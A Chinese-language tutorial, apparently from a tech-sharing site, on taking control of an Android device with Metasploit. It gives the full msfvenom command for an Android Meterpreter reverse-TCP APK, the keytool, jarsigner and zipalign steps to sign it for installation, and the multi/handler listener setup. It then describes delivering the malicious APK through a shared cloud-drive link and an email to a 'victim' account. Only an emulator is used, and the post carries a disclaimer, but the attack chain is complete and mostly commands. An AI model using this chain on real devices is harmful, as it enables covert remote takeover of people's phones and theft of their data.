IT技術互動交流平臺

如何使用Metasploit對安卓手機進行控制

作者:佚名  發布日期:2016-05-17 22:04:21


文章內容可能具有一定攻擊性,本文僅供技術交流,如有非法使用后果自負。
在這次的實驗中,我會使用kali linux和安卓模擬器演示如何使用Metasploit框架控制Android設備。
創建負載
我們需要兩臺虛擬機:Kali Linux和安卓模擬器。

 
 
打開vm啟動Kali linux。接著打開終端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的組合。它是一個單一的工具。它有標準的命令行選項。 Msfvenom用來制造的有效載荷用來滲透Android模擬器。
一旦打開終端提示符下輸入以下命令,使用msfvenom工具來創建有效載荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
```
p 設置要使用的payload
LHOST 設置用來接收反彈連接的主機
LPORT 設置用來接收反彈連接的端口
R 設置文件格式
Location 要保存的文件位置
這個命令執行完之后,你會看到一些錯誤,但不用擔心。現在可以到輸出目錄查看生成的apk了。

 
 
我們已經成功創建了Android格式(APK)文件的有效載荷。現在一般Android的移動設備不允許安裝沒有適當簽名證書的應用程序。 Android設備只安裝帶有簽署文件的APK。
我們可以使用如下工具進行手動簽名:
l Keytool (已安裝)
l jar signer (已安裝)
l zipalign (需要安裝)
執行下列命令簽名。首先使用密鑰工具創建密鑰庫。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`

 
然后使用JARsigner簽名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner驗證簽名
jarsigner -verify -verbose -certs APPNAME.apk
`

 
Kali沒有預裝Zipalign,需要先apt-get install zipalign。然后用zipalign來驗證apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

 
現在我們有了一個帶有簽名的APK,它可以安裝在任何設備上。

 
使用Metasploit進行測試
接下來啟動metasploit的監聽器。執行msfconsole打開控制臺。

 
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit

 

是時候將惡意的APK發送到手機上。我們這里使用一個網盤上傳我們的APK,并將下載鏈接分享出去。

 
 
這是我們切換到安卓模擬器。
1、從https://code.google.com/archive/p/android-x86/downloads下載android x86的iso。
2、使用vmware創建一個內核版本為2.6的虛擬機。
3、掛載鏡像,啟動虛擬機。
4、進入Live模式。
5、設置手機并登陸谷歌帳號。
在安卓模擬器里面點擊那個鏈接并下載。我們已經發送了一封郵件到受害者的谷歌帳號上。

 
另外要允許安卓安裝來歷不明的apk。



 
切換回Kali,我們發現創建了一個新的會話。

 
然后你就可以為所欲為的操作這臺“手機”了。

 
 
Tag標簽: 安卓   手機  
  • 專題推薦

About IT165 - 廣告服務 - 隱私聲明 - 版權申明 - 免責條款 - 網站地圖 - 網友投稿 - 聯系方式
本站內容來自于互聯網,僅供用于網絡技術學習,學習中請遵循相關法律法規
香港最快开奖现场直播结果